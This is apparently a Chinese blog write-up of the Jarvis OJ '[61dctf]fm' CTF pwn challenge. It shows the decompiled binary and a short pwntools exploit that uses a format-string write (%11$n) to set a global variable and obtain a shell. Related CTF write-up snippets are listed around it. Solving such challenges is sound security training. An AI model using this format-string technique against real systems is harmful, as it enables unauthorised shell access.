[61dctf]fm

最新推荐文章于 2024-09-11 10:21:36 发布
最新推荐文章于 2024-09-11 10:21:36 发布
阅读量139 收藏
点赞数
分类专栏: ctf 笔记 文章标签: 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/125613224
版权
笔记 同时被 2 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏

[61dctf]fm

附件地址 : https://dn.jarvisoj.com/challengefiles/fm.eaef2247796c11db798a579396482399

nc pwn2.jarvisoj.com 9895

在这里插入图片描述

checksec Canary found栈溢出行不通

在这里插入图片描述

main函数

在if判断了x的值,但是x的值是我们不可控制的,printf输出了&buf的值,这里是可以进行格式化字符串攻击的,而且if判断的是4 而$n可以输出4的int值到任意的地址中。

在这里插入图片描述

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+2Ch] [ebp-5Ch]
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(&buf, 0, 0x50u);
  read(0, &buf, 0x50u);
  printf(&buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

可以看到输出aaaa的偏移量的11

在这里插入图片描述

在这里插入图片描述

通过动态调试,把x的值设置为0x4,运行后确实得到shell

在这里插入图片描述

在这里插入图片描述

exp

在这里插入图片描述

from pwn import *


io = process("./stack")
io = remote("pwn2.jarvisoj.com", 9895)
x_addr = 0x0804A02C
context(log_level="debug", arch="i386")

payload = flat([x_addr,'%11$n'])



io.sendline(payload)
io.interactive()
[mzq]
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
git源码泄露及php注入——【61dctf】babyphp writeup
Ve99tr’s Blog
09-04 1374
题目链接:http://web.jarvisoj.com:32798/ 描述 进入页面后点击导航栏的About选项 关键点:GIT git源码泄露 当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。 摘自:https://www.freebuf.com/sectool/66096.html 关于g...
desc巧用及反引号 ` SQL注入——【61dctf】 inject writeup
Ve99tr’s Blog
09-02 1947
题目链接 :http://web.jarvisoj.com:32794/ 描述 进入页面,发现只有 flag{xxx} 题目hint:先找到源码~ 源码泄露 使用后台目录扫描工具御剑进行后台扫描 源码泄露: http://web.jarvisoj.com:32794/index.php~ F12查看器得到泄露的源码 <?php require("config.php"); $ta...
[Jarvis OJ - PWN]——[61dctf]fm
Y_peak的博客
02-17 287
[Jarvis OJ - PWN]——[61dctf]fm 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下, 开启了canary 和NX保护 在IDA中,查看一下, 这是一道格式化字符串的题。 找到x的地址 在pwndbg中进行调试一下, 寻找偏移 from pwn import * #p = remote("pwn2.jarvisoj.com",9895) p = process("./fm") gdb.attach(p
61dctf writeup
quedgee
10-29 2767
admin打开页面发现。。。。就一个Hello World= =,查看源代码也无果,那么抓个包吧= = emmmm,发现什么也没有,那么就robots.txt看看吧,发现果然有东西 web.jarvisoj.com:32792/robots.txt 访问这个后发现。。。。flag{hello guest}。。。。嗯。。。被骗了,提交这个没有用 那么在这个页面抓个包,再改一次admin
JarvisOJ web题目 [61dctf]inject 解题思路----mysql反引号与单引号的区别
__Curtain_
04-12 2451
原题:http://web.jarvisoj.com:32794/    给了一条提示先找到源码,几种常见的源码泄露方式都试一边。最后在提交 http://web.jarvisoj.com:32794/index.php~ 发现源码。 &lt;?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $ta...
(Jarvis Oj)(Pwn) fm
Nothing
06-18 1260
(Jarvis Oj)(Pwn) fm 查看保护。 ida查看程序逻辑。 第12行,很明显的格式化字符串漏洞,当全局变量x的值是4的时候会执行system函数,查看x的值。 x的值是3。所以就要利用格式化字符串漏洞的任意地址读写,“x_addr%[i]$n”,%n可以将已经输出的字符个数写入到指定的参数中,这个格式化字符串会在栈上的某处,需要定位x_addr作为printf的第...
[61dctf] stheasy
Selukwe的博客
04-24 456
题目下载:ctf2.b93676be23733b2fcda3988c1133c1c1 解题思路: 是个 Linux 下的 ELF 文件,拖到 IDA 中分析,定位 main 函数,F5 看代码。 逻辑很简单,先输入 flag,然后重点在 if 语句的判断,也就是 sub_8048630 函数是对 flag 进行检查,双击进去。 s 就是输入的 flag,v1 显然是 flag 的长...
[61dctf]inject
Mikasa
04-19 709
本题考察了Mysql中反引号与不同引号的区别。。 提示有源码。。扫描一下: 看见了index.php~,访问一下,就发现: desc table_name 是用来查询表结构的,例如: 如果要成功,就必须保证此表存在。。 我们也看到了后面的源码。。。需要我们构造Payload,可是Payload也会被带入表中查询。。肯定会出错的。。。 这里面就用到了反引号的作用。。 简单理解 我们...
CRYPTO [61dctf]cry Writeup(RSA已知p的高位攻击)
01-20
[61dctf]cry 题目来源:https://www.jarvisoj.com/challenges Coppersmith攻击:已知p的高位攻击 关键点:用SageMath 恢复RSA完整的p 题目给了源码,其中print如下信息: print ====welcome to cry system==== (p,q...
【jarvisoj刷题之旅】逆向题目[61dctf]androideasy的writeup
iqiqiya的博客
09-09 712
题目名字androideasy    那么猜测就是一个apk   winhex打开后果然是   改下后缀   载入Androidkiller   直接看java源码      明显可以看出关键就在check()方法     很明显就是一个简单的异或运算 那么我们只要将byte[ ] s的每一个字符与0x17异或即可得到flag Py代码: a = [113...
matlab dctf
10-09
DCTF是一种离散余弦变换,常用于信号和图像的压缩、降噪等方面。在Matlab中可以使用dct2函数进行二维离散余弦变换。 示例代码: ``` img = imread('lena.jpg'); img = im2double(img); % 转换为双精度型 dct_img =...
Jarvis Oj Pwn 学习笔记-fm
baoan4763的博客
06-11 172
格式化串漏洞(32bit): 链接领走: https://files.cnblogs.com/files/Magpie/fm.rar nc pwn2.jarvisoj.com 9895 首先验身: 看到某种奇怪的鸟类不禁慌了一哈...... 好,现在丢IDA: 先是看到了这样一个妩媚妖艳的东西...她被调用在main函数: 跟进去: 没看懂....(或许...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8455
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
浅谈网络安全的认识与学习规划
qq_201729558
09-05 1029
本文主要介绍网络安全认识与学习规划
快速失败 (fail-fast) 和安全失败 (fail-safe)
Flying_Fish_roe的博客
09-07 837
快速失败是一种系统设计原则,当系统遇到异常情况或错误时,立即停止执行并返回错误,而不是试图继续执行或处理潜在的问题。快速失败系统会主动检测系统中的问题,并尽早报告错误,以防止错误进一步传播或导致更大的问题。在快速失败系统中,当检测到某些异常条件或不一致时,系统立即抛出异常或错误,停止当前操作并通知用户或开发者。这种机制通常用于防止错误堆积,使得系统可以快速恢复到正常状态,并尽早解决问题。快速失败的核心思想是“及早报告、及早修复”。通过尽早暴露错误,开发者能够更容易地定位问题,减少问题在系统中的蔓延。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 646
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 966
在2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
稀土阻燃剂:电子设备的安全守护者
最新发布
Kingcela1的博客
09-11 456
稀土阻燃剂在电子设备中的应用主要是通过提升材料的阻燃性能、热稳定性和环保安全性,来满足现代电子产品对高性能和安全性的需求。随着技术的不断进步,稀土阻燃剂在电子设备领域的应用前景将会更加广阔。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值